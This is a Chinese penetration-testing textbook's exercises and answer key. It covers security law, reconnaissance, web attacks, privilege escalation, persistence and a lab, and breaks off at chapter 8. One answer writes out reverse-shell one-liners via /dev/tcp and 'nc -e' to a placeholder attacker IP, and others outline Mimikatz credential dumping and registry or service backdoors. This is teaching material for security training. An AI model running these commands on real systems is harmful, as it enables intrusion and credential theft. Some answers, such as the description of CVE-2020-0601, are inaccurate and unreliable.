渗透测试技术 习题及答案汇 刘兰 第1-8章

第一章习题及参考答案一、单项选择题1．《中华人民共和国网络安全法》自2017年6月1日起施行。（）A．正确 B．错误2．我国制定《中华人民共和国网络安全法》的目的是（）。A．保障网络安全，维护网络空间主权和国家安全、群众公共利益B．保护公民、法人和其他组织的合法权益C．促进经济社会信息化健康发展D．以上都是3．违反《中华人民共和国网络安全法》规定，构成违反治安管理行为的，依法给予治安管理处罚，构成犯罪的，依法追究（）。A．刑事责任 B．行政责任 C．民事责任4．网络运营者应当对其收集的用户信息严格保密，并建立健全用户信息保护制度。（）A．正确 B．错误5．任何组织和个人不得窃取或以其他非法方式获取个人信息，不得非法出售或非法向他人提供个人信息。（）A．正确 B．错误二、简答题1．什么是渗透测试？渗透测试的一般流程是什么？渗透测试是一种安全测试方法，旨在检测系统、网络或应用程序的漏洞，并尝试利用这些漏洞来模拟黑客的攻击行为，以此来修复漏洞。渗透测试旨在帮助用户识别并修复潜在的安全漏洞，以提高系统的安全性。渗透测试的一般流程是：预先准备与信息收集、漏洞扫描与分析、漏洞利用与攻击实施、维持访问与持久化、清理与撤离。2．一份完整的渗透测试报告应包含哪些内容？一份完整的渗透测试报告应该包含：报告结构与内容、漏洞描述与风险评估、改进建议、渗透测试报告编写的准则和建议。3．常见的安全漏洞有哪些？常见的安全漏洞包括：1）SQL注入：攻击者通过恶意SQL语句访问数据库。2）跨站脚本（XSS）：攻击者在网页中插入恶意代码，窃取用户数据。3）缓冲区溢出：通过超出程序预期的数据输入导致系统崩溃或执行恶意代码。4）弱密码：简单或重复使用的密码易被破解。5）未授权访问：缺乏正确的身份验证机制，导致资源被非法访问。6）未修补的漏洞：软件或系统未及时更新补丁，易被攻击者利用。7）文件包含漏洞：攻击者利用不安全的文件引用来执行恶意代码。这些漏洞可能被攻击者利用，导致系统受损或数据泄露。4．与网络安全相关的法律法规有哪些？《中华人民共和国网络安全法》、《中华人民共和国数据安全法》、《中华人民共和国个人信息保护法》。5.常见的网络防护技术有哪些？常见的网络防护技术包括以下几种：1）防火墙（Firewall）：控制进出网络的数据流量。2）入侵检测与防御系统（IDS/IPS）：监控并阻止潜在的攻击。3）虚拟专用网络（VPN）：加密远程连接，确保数据安全。4）数据加密：保护数据传输的隐私性和完整性。5）访问控制：确保只有授权用户能访问特定资源。6）防病毒软件：检测并清除恶意软件。7）DDoS防护：应对和缓解拒绝服务攻击。这些技术可以有效提高网络安全，防范多种威胁。第二章练习题一、选择题1、下列哪个不是搜索引擎（）。A.撒旦 B.钟馗之眼C.天眼查 D.bing2、下列哪个工具不能用于信息搜集（）。A.sqlmap B.digC.dnsenum D.nslookup3、下列哪个在线工具可以进行Web程序指纹识别（）。A.nmap B.OpenVASC.御剑 D.whatweb4、在GoogleHacking中，下面哪一个是搜索指定文件类型的语句（）。A.intext B.intitleC.site D.filetype5、以下哪个不是msf的基本常用命令？（）。A.showexploits B.searchC.use D.showinfo二、简答题1、请简要说明信息收集的概念和作用。2、请简要说明Windows信息收集的类别与方法。3、请简要说明网络信息收集中常见的端口及攻击方向。4、请简要说明网络信息收集中识别防火墙的方法。5、请简要说明域名信息收集中常见的查询方法。答案一、选择题1-5、AADDC二、简答题1、答：信息收集是指通过各种方式获取所需要的信息。它是信息利用的第一步，也是关键的一步。信息收集的目标广泛多样，包括服务器信息、网站信息、域名信息、人员信息等。信息收集的作用主要是为渗透测试提供更多关于被测试者的信息，从而扩大攻击面并为钓鱼攻击等手段打好基础。信息收集对于渗透测试成功至关重要，也是渗透测试员必备的关键技能之一。2、答：在渗透测试中，收集Windows主机的信息是至关重要的一步。其中，Windows账号密码是获取管理员权限后的首要任务，可以通过使用Mimikatz直接抓取、使用Procdump+Mimikatz抓取、读取注册表并使用Mimikatz解密抓取等方法获取。另外，还可以收集RDP登录凭据、浏览器账号密码、其他软件账号密码、Wi-Fi账号密码以及Web服务器配置路径等信息。3、答：在网络信息收集中，渗透测试员需要关注常见的端口及攻击方向。其中，文件共享服务的常见端口有21/22/69，攻击方向包括匿名上传、下载、爆破和嗅探；远程连接服务的常见端口有22/23/3389/5900/5623，攻击方向包括爆破、SSH隧道和内网代理转发、远程代码执行等；Web应用服务的常见端口有80/443/8080/7001/7002等，攻击方向包括Web攻击、爆破、对应服务器版本漏洞等；数据库服务的常见端口有3306/1433/1521/5432等，攻击方向包括注入、提权、爆破等；邮件服务器的常见端口有25/110/143等，攻击方向包括邮件伪造、爆破、嗅探等；网络常见协议的常见端口有53/67/68/161等，攻击方向包括DNS劫持、劫持、爆破等；特殊服务的常见端口有2181/8069/9200等，攻击方向包括未授权访问、远程代码执行等。4、答：在网络信息收集中，识别防火墙的方法主要是通过发送数据包，检查回包来判断防火墙的过滤规则和开放的端口。根据回包的情况，可以判断防火墙的类型和过滤规则。渗透测试员可以使用scapy和Nmap等工具进行防火墙识别，发送TCP的ACK包进行探测。但需要注意的是，扫描防火墙时需要尽量隐蔽，以避免被防火墙发现。5、答：域名信息收集中常见的查询方法包括域名查询和Whois查询。域名查询是通过域名系统（DNS）将域名解析为IP地址，使人们能够更方便地访问互联网。通过域名查询，可以获取域名对应的IP地址，了解网站的服务器位置。而Whois查询是一种传输协议，用于查询域名的IP地址和所有者等信息。通过Whois查询，可以获取域名注册者的邮箱地址等信息，帮助渗透测试员获取更多域名注册者的个人信息。常见的Whois查询方法包括Web接口查询、通过Whois命令查询以及Python撰写Whois代码查询。第三章习题一、单项选择题1．关于存储型XXS攻击和反射型XSS攻击，以下说法不正确的是（）。A．XSS攻击可以采用Token进行防范B．反射型XSS攻击会将数据保存到数据库C．XSS攻击可以通过在输入框中输入script脚本进行测试D．对于DVWA靶场，不同的安全级别，防御能力也不同2．（）是自动化SQL注入工具。A．Nmap B．SQLmap C．MSF D．Nessus3．以下哪一项不属于XSS攻击的危害？（）A．SQL数据泄露 B．钓鱼欺骗 C．身份盗用 D．网站挂马4．Tomcat的默认端口是（）。A．1433 B．80 C．1521 D．80805．在MySQL数据库中，（）库保存了MySQL所有的信息。A．system_information B．information_sysC．information_schema D．information_sys_schema二、简答题1．请简要说明Web安全的3个阶段分别是什么。2．请简要介绍Web服务器的工作机制。3．请简要介绍B/S架构和C/S架构。4．请简要说明HTTP的请求和应答模型。5．请简要介绍BurpSuite工具。参考答案一、单项选择题1-5、BBADC二、简答题1、答：Web安全的三个阶段分别是Web1.0时代、Web2.0时代和Web3.0时代。Web1.0时代关注服务器端动态脚本的安全问题，如SQL注入和XSS攻击；Web2.0时代的兴起增强了XSS和CSRF等攻击的威力，并引入了新的脚本语言和移动互联网技术；Web3.0时代旨在使互联网更加智能和互联，使用区块链技术和金融属性，可能面临更复杂的攻击类型。2、答：Web服务器是使用HTTP协议与客户端浏览器交换信息并为互联网客户提供服务的主机。其工作机制可以分为四个步骤：首先，客户端浏览器发送HTTP请求到Web服务器；然后，Web服务器接收请求并处理；接着，Web服务器返回HTTP响应给客户端浏览器；最后，客户端浏览器接收响应并显示网页内容。3、答：B/S架构（浏览器/服务器）是一种Web应用架构，将表示层、业务层和数据层逻辑上相互分离。客户端通过Web浏览器访问服务器，无需特殊安装，简化了系统的开发和维护。C/S架构（客户端/服务器）是另一种Web应用架构，使用两层架构，客户端安装程序与服务器通信，可以降低系统的通讯开销。4、答：HTTP协议遵循请求/应答模型。客户端向服务器发送请求消息，包括请求行、请求头和请求正文。请求行包含请求方法、资源的URL和协议/版本。服务器接收请求并处理，返回适当的应答消息，包括状态行、响应头和响应正文。状态行包含协议/版本、状态码和状态描述。5、答：BurpSuite是一款常用的Web渗透测试工具，用于检测和攻击Web应用的漏洞。它包含多个模块，如代理、扫描器、拦截器等，可以协助渗透测试人员发现和利用Web应用的漏洞。BurpSuite功能强大且易于使用，是Web渗透测试人员的常用工具之一。第四章主机渗透一、单项选择题1．下列哪个端口是Samba服务对应的端口？（C）A．22 B．80 C．139 D．4432．下列哪个命令可以查看新建文件的内容？（B）A．echo B．cat C．ls D．rm3．下列哪个步骤不是主机渗透测试的常见步骤？（D）A．攻击目标 B．收集信息 C．分析漏洞 D．修复漏洞4．下列哪个工具可以用于主机渗透测试中的端口扫描？（A）A．Nmap B．Wireshark C．Metasploit D．JohntheRipper5．下列哪个操作可以上传木马并留下后门？（D）A．替换文件内容 B．扫描网络上的主机C．提权 D．上传文件二、简答题1．请简要介绍Samba服务远程溢出漏洞。Samba服务的远程溢出漏洞通常是指在Samba的某些版本中存在的缓冲区溢出或代码执行漏洞，允许未经授权的远程攻击者执行任意代码或获取系统的访问权限。此类漏洞通常发生在对用户输入处理不当的情况下，导致输入超出缓冲区范围，从而覆盖或篡改内存中的重要数据结构，甚至导致控制流被劫持。请列举主机渗透测试的常见步骤。（1）查找漏洞（可以在网上查找公开的平台漏洞）。（2）选择Rank等级较高的模块，并选中模块。（3）查找漏洞可复现的操作系统类型。（4）查看模块需要配置的参数。（5）查找可用的攻击载荷。（6）开始渗透。3．请简要介绍主机渗透测试中的信息收集方法。（1）互联网方式获取，即获取网址、IP地址和服务器所在地址等。（2）获取真实IP地址后，根据IP地址获取服务器信息，如操作系统、开放端口和服务等。（3）根据获取的服务器信息，进行漏洞扫描，从而决定攻击策略。4．请简要介绍主机渗透测试中的漏洞分析方法。(1)信息收集：通过扫描和探测工具（如Nmap、Netcat）收集目标主机的操作系统、开放端口、服务版本等基本信息，为后续的漏洞分析提供基础。(2)漏洞扫描：使用漏洞扫描工具（如Nessus、OpenVAS）识别主机上的已知漏洞。扫描器会根据数据库中的已知漏洞特征匹配系统中的安全弱点，列出潜在的安全风险。漏洞验证：对识别出的漏洞进行验证，以判断其是否真实存在，或是否具有可利用性。这可以通过手动测试或借助渗透测试框架（如Metasploit）来执行。(3)权限提升：在发现漏洞后，测试者可能会尝试利用漏洞提升权限，以获得系统的更高控制权。提权成功表明系统存在严重的安全问题。(4)报告分析结果：整理分析出的漏洞信息，生成报告，包括漏洞描述、风险等级、修复建议等，以帮助运维人员进行修复。5．请简要介绍主机渗透测试中的攻击方式。（1）社会工程学攻击方式（2）运用层方式（3）信息收集第五章习题及参考答案单项选择题1.在Windows环境中，下列哪个账户权限最高？（）答案：D．系统权限解析：在Windows操作系统中，System账户拥有最高权限，超越了管理员账户。System账户用于操作系统内部的关键任务，具有完全的访问权限。2.在Linux系统中，下列哪种用户拥有最广泛的权限？（）答案：A．超级管理员（root）解析：root用户是Linux系统中的超级管理员，拥有系统的最高权限，能够执行所有操作和访问所有文件。3.以下关于Windows系统中的TrustedServicePaths漏洞的描述，哪一项是正确的？（）答案：A．这种漏洞源自Windows系统中CreateProcess函数的特性，即在解析文件路径时，只会对路径中的最后一个文件进行识别和执行解析：TrustedServicePaths漏洞利用了CreateProcess函数在解析可执行文件路径时，仅识别路径中的最后一个文件。如果服务路径未严格指定，攻击者可以通过在路径中插入恶意可执行文件，从而提升权限。4.下列哪个命令用于设置SUID权限？（）答案：A．chmodu+sfilename解析：chmodu+sfilename命令用于设置文件的SUID（SetUserID）权限，使得执行该文件的用户以文件所有者的权限运行。5.下列哪个不是攻击者利用系统内核漏洞进行提权的方式？（）答案：D．利用防火墙漏洞解析：攻击者常通过利用驱动程序漏洞、内核模块漏洞或覆盖关键数据结构来进行提权。防火墙漏洞通常与网络访问控制相关，不直接用于内核级别的权限提升。简答题1.请描述水平权限提升和垂直权限提升的区别。答案：水平权限提升（HorizontalPrivilegeEscalation）：攻击者在拥有相同权限级别的情况下，访问或操作本不属于自己的资源或数据。例如，普通用户访问其他普通用户的文件或数据。垂直权限提升（VerticalPrivilegeEscalation）：攻击者通过利用系统漏洞，从较低权限级别提升到更高权限级别，如从普通用户提升到管理员或系统权限。这通常涉及绕过安全控制机制，获取更广泛的系统访问权限。水平权限提升涉及同等级别权限之间的不当访问，而垂直权限提升则涉及权限级别的跨越提升。2.请解释系统漏洞提权和数据库提权的基本概念和方法。答案：系统漏洞提权（SystemPrivilegeEscalation）：攻击者利用操作系统中的安全漏洞，通过各种手段提升其在系统中的权限级别。例如，利用未打补丁的内核漏洞、SUID程序漏洞、权限配置错误等，使得普通用户获得管理员或系统级别权限。常见方法：•利用内核漏洞或驱动程序漏洞。•利用SUID/SGID程序执行恶意代码。•覆盖或修改关键系统文件和配置。•数据库提权（DatabasePrivilegeEscalation）：攻击者通过利用数据库系统中的漏洞或配置错误，提升其在数据库中的权限级别，从而执行更高权限的操作，如获取敏感数据、修改数据或控制数据库服务器。常见方法：•利用SQL注入漏洞获取数据库管理员权限。•利用数据库软件中的未修补漏洞。•通过弱密码或默认配置获取高权限账户访问。系统漏洞提权侧重于操作系统层面的权限提升，而数据库提权则专注于数据库管理系统内部的权限提升。3.在利用TrustedServicePaths漏洞提权时，使用PowerUp脚本的AllChecks模块会检查哪些可能存在问题的情况？请举例说明。答案：使用PowerUp脚本的AllChecks模块在利用TrustedServicePaths漏洞提权时，会检查以下可能存在的问题：•不安全的服务路径：检查服务配置中是否使用了相对路径或未完全限定的路径，允许攻击者在路径中插入恶意可执行文件。举例：某服务配置为C:\ProgramFiles\Service\service.exe，但如果路径中包含空格且未使用引号，攻击者可以在C:\ProgramFiles\Service\目录下放置一个名为service.dll的恶意文件，利用路径解析漏洞加载执行。•可写的服务目录：检查服务执行文件所在目录是否对普通用户可写，允许攻击者替换或添加恶意文件。举例：如果C:\ProgramFiles\Service\目录对普通用户具有写权限，攻击者可以在该目录下创建或替换执行文件，从而在服务启动时执行恶意代码。•服务权限配置错误：检查服务是否以高权限运行，如果服务以系统权限运行且存在路径解析漏洞，攻击者可以通过漏洞提升权限。AllChecks模块通过全面检查服务路径的安全性、目录权限和服务配置，帮助识别可能被利用的TrustedServicePaths漏洞。4.描述SUID权限的特性和可能的提权攻击方式，并列举几种防范SUID提权的措施。答案：•SUID权限的特性：•SUID（SetUserID）是Unix和Linux系统中的一种权限位。当一个可执行文件设置了SUID位后，任何执行该文件的用户都会以文件所有者的权限运行该程序。通常，SUID位被设置在拥有高权限的程序上，如/bin/passwd，允许普通用户修改密码文件。•可能的提权攻击方式：•利用SUID程序漏洞：攻击者发现SUID程序存在输入验证不足或缓冲区溢出等漏洞，通过构造恶意输入或代码执行来获取更高权限。•环境变量操控：利用SUID程序在执行时依赖环境变量，攻击者可以通过修改环境变量来执行任意命令。•路径劫持：如果SUID程序调用外部命令而未使用绝对路径，攻击者可以在PATH中插入恶意可执行文件。•防范SUID提权的措施：1.最小化SUID程序数量：仅在绝对必要时设置SUID权限，避免不必要的高权限程序。2.定期审计SUID文件：使用工具如find命令定期检查系统中设置了SUID位的文件，确保其安全性。3.限制环境变量：在SUID程序中清除或严格限制环境变量，防止环境变量被滥用。4.使用安全编程实践：确保SUID程序代码中不存在缓冲区溢出、输入验证不足等漏洞。5.应用访问控制机制：利用如SELinux或AppArmor等强制访问控制系统，限制SUID程序的权限和行为。SUID权限为系统提供了必要的功能，但也带来了潜在的安全风险。通过合理配置、定期审计和安全编程，可以有效防范SUID相关的提权攻击。5.描述什么是系统内核漏洞，以及攻击者可能如何利用系统内核漏洞进行提权攻击，并给出至少两个具体的例子。答案：•系统内核漏洞的定义：•系统内核漏洞是指操作系统内核中存在的安全缺陷或漏洞，这些漏洞可能被攻击者利用，以绕过安全机制、执行未经授权的操作或提升权限。由于内核处于操作系统的核心，拥有最高权限，内核漏洞的利用往往能够导致严重的安全后果。•攻击者利用系统内核漏洞进行提权攻击的方法：1.代码执行漏洞：攻击者通过漏洞注入并执行任意内核代码，从而获得系统权限。2.权限绕过：利用漏洞绕过权限检查机制，直接修改内核数据结构或权限标志。3.信息泄露：通过内核漏洞获取敏感信息，如密码哈希、内存中的关键数据，辅助进一步的提权攻击。•具体例子：1.DirtyCOW（CVE-2016-5195）：•描述：这是一个在Linux内核中的竞争条件漏洞，允许本地用户通过利用内存映射机制，修改只读文件，从而获取写权限。•利用方式：攻击者利用该漏洞修改如/etc/passwd等关键系统文件，添加或修改用户账户以获取更高权限。2.Windows内核漏洞（如CVE-2020-0601）：•描述：这是一个Windows内核中的漏洞，允许攻击者通过伪造数字证书，绕过安全检查，执行任意代码。•利用方式：攻击者利用该漏洞在系统中执行恶意内核级代码，从而提升权限至系统级，完全控制受影响的计算机。系统内核漏洞由于其在操作系统核心层面的影响，常被攻击者用于实现高效的权限提升和系统控制。及时修补内核漏洞和采用安全的编程实践是防范此类攻击的关键。第六章习题一、单项选择题1．在进行后渗透测试时，以下哪种操作不能帮助攻击者维持对目标系统的持久性控制？（）A．创建绑定Shell或反弹Shell B．创建调度任务C．执行ARP扫描 D．创建新用户2．以下哪种情况不适用于使用反弹Shell？（）A．目标机器因防火墙受限，只能发送请求，不能接收请求B．目标机器端口被占用C．目标机器处于公共网络，IP地址固定，攻击机器可以直接连接D．对于病毒、木马，受害者何时能“中招”、对方的网络环境是什么样的、什么时候开关机等情况都是未知的3．关于权限维持的描述，以下哪项是不正确的？（）A．权限维持是指攻击者在成功入侵系统后，为了保持对该系统的持久访问能力，使用各种技术和工具，绕过系统的安全机制B．Windows的辅助功能镜像劫持是通过使用Windows内置的调试功能IFEO（ImageFileExecutionOptions）来实现的C．在Windows权限维持中，启动项/服务后门和系统计划任务后门都需要攻击者获取系统管理员权限才能创建D．在Linux权限维持中，Crontab计划任务后门是通过修改系统的/etc/crontab文件实现的4．以下哪种类型的木马会模拟用户点击广告等行为来获取高额的广告推广费用？（）A．网游木马 B．网银木马 C．下载类木马 D．网页点击类木马5．根据本章内容，下列叙述中错误的是（）。A．在网络攻击后，攻击者通常需要清除日志和操作记录，以隐藏其入侵痕迹B．攻击者常用的隐匿方式之一是“肉鸡”和代理服务器混合组成的跳板链C．Socks5代理服务器仅能响应HTTP通信协议，并过滤除80、8080等Web常用端口外的其他端口访问请求D．Tor是许多攻击者用来隐藏自己的工具二、简答题1．请详细解释什么是后渗透，包括其目的、方法和在渗透测试中的重要性。说明在进行后渗透测试时，如何有效地隐藏攻击行为，避免被系统管理员和安全设备检测到。2．请详细解释反弹Shell的工作原理，以及在Linux和Windows系统下如何使用反弹Shell。3．简述Windows权限维持中启动项/服务后门的创建过程。4．请简述木马的两个主要部分，并说明这两部分是如何协同工作的。5．请简述网络攻击者是如何利用跳板来隐藏自己的行踪的。参考答案一、单项选择题C．执行ARP扫描不能帮助攻击者维持对目标系统的持久性控制。C．目标机器处于公共网络，IP地址固定，攻击机器可以直接连接的情况下，不适合使用反弹Shell。C．在Windows权限维持中，启动项/服务后门和系统计划任务后门不一定需要系统管理员权限才能创建。D．网页点击类木马会模拟用户点击广告行为来获取广告推广费用。C．Socks5代理服务器不仅能响应HTTP协议，还可以处理其他协议，不会过滤除80、8080等Web常用端口外的其他端口访问请求。二、简答题1.后渗透定义与目的：后渗透是指在成功入侵目标系统后，攻击者进行进一步操作的阶段，包括权限提升、信息收集、持久性控制等，目的是扩展控制、获取更多敏感信息。方法：创建后门、调度任务、收集密码等操作；使用凭证窃取、横向移动等手段访问更多系统资源。重要性：后渗透能够进一步加深攻击效果，同时确保攻击者可以长期控制目标系统，实现持久性。隐藏攻击行为：隐藏文件、日志清除、使用代理或跳板、加密通信、伪装为合法进程或服务，绕过IDS/IPS等安全检测工具，减少痕迹暴露。2.反弹Shell的工作原理原理：反弹Shell是指目标主机主动连接攻击者的控制端，将其Shell或命令行环境反弹到控制端，适用于目标主机无法接受外部连接的情况。在Linux系统中使用：通常通过bash-i>&/dev/tcp/攻击者IP/端口0>&1实现，目标主机的Shell会连接攻击者监听的端口。在Windows系统中使用：可利用nc.exe实现，命令如nc-ecmd.exe攻击者IP端口，使得Windows目标的cmd环境反弹到攻击者控制端。3.Windows权限维持中启动项/服务后门的创建过程创建启动项后门：在注册表的HKCU\Software\Microsoft\Windows\CurrentVersion\Run或HKLM\Software\Microsoft\Windows\CurrentVersion\Run中添加恶意程序路径，使得系统启动时自动执行。创建服务后门：使用sccreate命令创建一个新的服务，将恶意程序作为服务添加到系统，服务启动时即可执行恶意代码。4.木马的主要部分控制端：攻击者端，用于发送指令、控制木马操作。受控端（客户端）：受害者系统中的木马组件，负责接收控制端的指令，执行相应操作。协同工作方式：控制端通过网络发送指令，受控端接收并执行，如收集数据、远程控制。两者通常通过加密连接保持隐蔽通信，避免被检测。5.利用跳板隐藏行踪跳板定义：攻击者通过多个中间代理（跳板）进行攻击，每个跳板都是一个中转站，隐藏最终的真实IP。过程：攻击者使用“肉鸡”、代理服务器等形成跳板链，每个跳板作为中转站发送请求，逐层连接，最终访问目标；如通过Socks代理、Tor网络等多层加密传输，使得溯源难度增大，有效隐藏真实位置。第七章习题及参考答案单项选择题以下使用哪个工具可以探测某个网段内的主机存活状态？（）A.DirsearchB.NmapC.NessusD.BurpSuite以下使用哪个工具可以扫描某个网站是否存在漏洞？（）A.DirsearchB.NmapC.AWVSD.BurpSuite要获取数据库中后台管理员账密，正确的顺序是（）。A.数据库版本、数据库名、表名、字段名、字段内容B.数据库版本、当前数据库物理路径、文件名、字段内容C.数据库名、字段名、表名、字段内容D.数据库版本、数据编码、表名、当前数据库名执行命令setrhosts21是设置（）。A.设置攻击主机地址B.设置脚本路径C.设置目标主机地址D.设置目标系统架构下面关于Metasploit说法错误的是（）。A.Metasploit是一个开源的渗透测试开源软件B.Metasploit项目最初是由HDMoore在2003年夏季创立C.可以进行敏感信息搜集、内网拓展等一系列的攻击测试D.Metasploit最初版本是基于c语言简答题请简述本渗透测试综合实验一的基本步骤。（1）信息收集：使用Nmap等工具对目标网络进行扫描，确定目标主机的存活状态和开放的端口。（2）漏洞分析：利用AWVS等工具对目标网站进行漏洞扫描，分析可能存在的安全漏洞。（3）漏洞利用：通过手工检测和SQL注入等技术手段，尝试利用发现的漏洞获取目标系统的访问权限。（4）权限提升：利用系统漏洞，如MS17-010，提升在目标主机上的权限。（5）后渗透：在获取一定权限后，进行内网渗透，创建管理员用户，远程登录到主机系统，获取目标主机的最高权限。请简述对某网站URL进行手工注入检测的方法。识别注入点：检查URL中是否存在参数，如?id=数字，这些参数可能是SQL注入的注入点。测试注入：在参数后添加SQL语句的一部分，如单引号(')，来测试系统是否对输入进行了适当的过滤和转义。观察响应：观察应用的响应，如果添加的注入代码导致错误或异常行为，可能表明存在注入漏洞。进一步测试：如果初步测试表明可能存在注入，进一步构造SQL语句来确定具体的数据库类型、版本和结构，以及可能的数据提取。请简述在本SQL注入实验中，当确定回显位置时，将语句中的6改成-6的目的。请简述如何使用BurpSuite进行渗透测试。答：在本SQL注入实验中，将语句中的6改成-6的目的是为了让原本正常的查询语句返回错误，从而确认哪些位置是查询结果的回显位置。通过改变查询逻辑，使得某些查询结果不再正常显示，可以帮助攻击者确定哪些列是可见的，进而利用这些列来提取数据库信息。请简述使用BurpSuite进行渗透测试的步骤：拦截请求：在浏览器中配置代理，使所有请求都通过BurpSuite进行拦截。分析请求：查看和分析拦截到的HTTP请求和响应，包括请求头、请求体和响应内容。修改请求：修改请求参数或头部信息，尝试发现安全漏洞，如SQL注入、XSS等。重放请求：对修改后的请求进行重放，观察服务器对不同请求的响应，以验证漏洞是否存在。扫描漏洞：使用BurpSuite的扫描器功能，自动扫描目标应用的漏洞。报告生成：根据测试结果，撰写渗透测试报告，记录发现的安全问题和建议的修复措施。漏洞利用的目的及MS17-010漏洞利用的实验步骤。答：漏洞利用的目的是在确认目标系统存在已知漏洞后，通过特定的技术手段，获取对目标系统的访问权限或提升权限。MS17-010漏洞利用的实验步骤包括：（1）确认漏洞：使用Nessus等工具扫描目标系统，确认目标系统是否存在MS17-010漏洞。（2）准备利用工具：准备Metasploit等渗透测试框架，查找对应的漏洞利用模块。（3）配置攻击参数：根据目标系统的具体情况，配置攻击载荷和攻击参数。（4）执行攻击：运行Metasploit，执行攻击脚本，尝试利用漏洞获取目标系统的控制权限。（5）后渗透操作：成功利用漏洞后，进行后续的权限提升、信息收集和内网渗透等操作。第八章习题一、单项选择题1．在下列选项中，哪个阶段是本实验的第一步？（）A．内网穿透和域渗透 B．外网渗透入侵Web服务器C．建立隧道扫描内网主机 D．获取域控制器及内网主机权限2．在下列选项中，哪种工具用于网络探测？（）A．Dirsearch B．Nmap C．AWVS D．Nessus3．哪个模块可以用于探测内网存活主